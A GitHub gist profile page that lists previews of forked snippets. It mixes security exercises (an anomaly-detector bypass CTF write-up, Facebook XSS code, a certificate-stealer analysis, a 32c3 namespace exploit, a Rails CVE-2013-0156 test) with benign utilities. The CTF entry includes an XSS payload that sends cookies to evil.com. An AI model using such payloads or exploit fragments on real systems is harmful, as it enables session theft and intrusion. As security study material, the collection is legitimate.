Skip to content

Instantly share code, notes, and snippets.

View 0xBADCA7's full-sized avatar

netcat 0xBADCA7

70 followers · 149 following
  • United States
View GitHub Profile
@0xBADCA7
0xBADCA7 / Anomaly
Created May 26, 2014 17:31 — forked from ngo/Anomaly
In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.
We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):
anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>
@0xBADCA7
0xBADCA7 / reflect.py
Created June 4, 2014 12:02 — forked from huyng/reflect.py
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
@0xBADCA7
0xBADCA7 / xss.js
Created June 5, 2014 19:05 — forked from matt-/iframe.html
// this is for the iframe to facebook.com
document.domain = 'facebook.com'
uid = 501558012;
app_id = 123456789012332;
function Image(){
// this should kill the click jacking report
}
// create a new iframe we will use to load facebook.com
@0xBADCA7
0xBADCA7 / analysis.rb
Created June 7, 2014 09:38 — forked from emboss/analysis.rb
# Original castealer.rb with analysis
#####################################################################################
require 'rubygems' #redundant
require 'openssl'
require 'digest/md5' #redundant
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) #redundant
ctx = OpenSSL::SSL::SSLContext.new #redundant
@0xBADCA7
0xBADCA7 / gist:e5cabff3cc1f984c2b0a
Last active August 29, 2015 14:11 — forked from isciurus/gist:5437231
<html lang="en">
<head>
<script>
function str2hex(str)
{
var out_str = " ";
for(var i = 0; i < str.length; i++)
{
@0xBADCA7
0xBADCA7 / wps_openwrt.sh
Last active August 29, 2015 14:13 — forked from alghanmi/wps_openwrt.sh
##
## WPS on OpenWRT
## This script enables Wi-Fi Protected Setup on OpenWRT.
##
## Resources
## http://wiki.openwrt.org/doc/uci/wireless#wps.options
##
#Install the full wpad package
opkg update
@0xBADCA7
0xBADCA7 / gdb_ascii_examine.txt
Last active August 29, 2015 14:20 — forked from nmcv/gdb_ascii_examine.txt
define xac
dont-repeat
set $addr = (char *)($arg0)
set $endaddr = $addr + $arg1
while $addr < $endaddr
printf "%p: ", $addr
set $lineendaddr = $addr + 8
if $lineendaddr > $endaddr
set $lineendaddr = $endaddr
end
@0xBADCA7
0xBADCA7 / latency.txt
Created November 8, 2015 13:49 — forked from jboner/latency.txt
Latency Numbers Every Programmer Should Know
Latency Comparison Numbers
--------------------------
L1 cache reference 0.5 ns
Branch mispredict 5 ns
L2 cache reference 7 ns 14x L1 cache
Mutex lock/unlock 25 ns
Main memory reference 100 ns 20x L2 cache, 200x L1 cache
Compress 1K bytes with Zippy 3,000 ns
Send 1K bytes over 1 Gbps network 10,000 ns 0.01 ms
Read 4K randomly from SSD* 150,000 ns 0.15 ms
@0xBADCA7
0xBADCA7 / unshare.c
Created December 30, 2015 09:26 — forked from stephenR/doit.sh
32c3_vault_exploit.c
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sched.h>
#include <sys/mount.h>
int main(int argc, char *argv[])
{
if(unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
@0xBADCA7
0xBADCA7 / yml_security_test.rb
Created January 15, 2016 11:48 — forked from jmccaffrey/yml_security_test.rb
Simple Rails security test for CVE-2013-0156
#you can copy this into IRB or just run it as a file
require "net/http"
require "uri"
# require "net/https" # for testing ssl
url = "http://localhost:3000/login"
yaml = %{ --- !ruby/object:Time {} }
xml = %{<?xml version="1.0" encoding="UTF-8"?><foo type="yaml">#{yaml}</foo>}.strip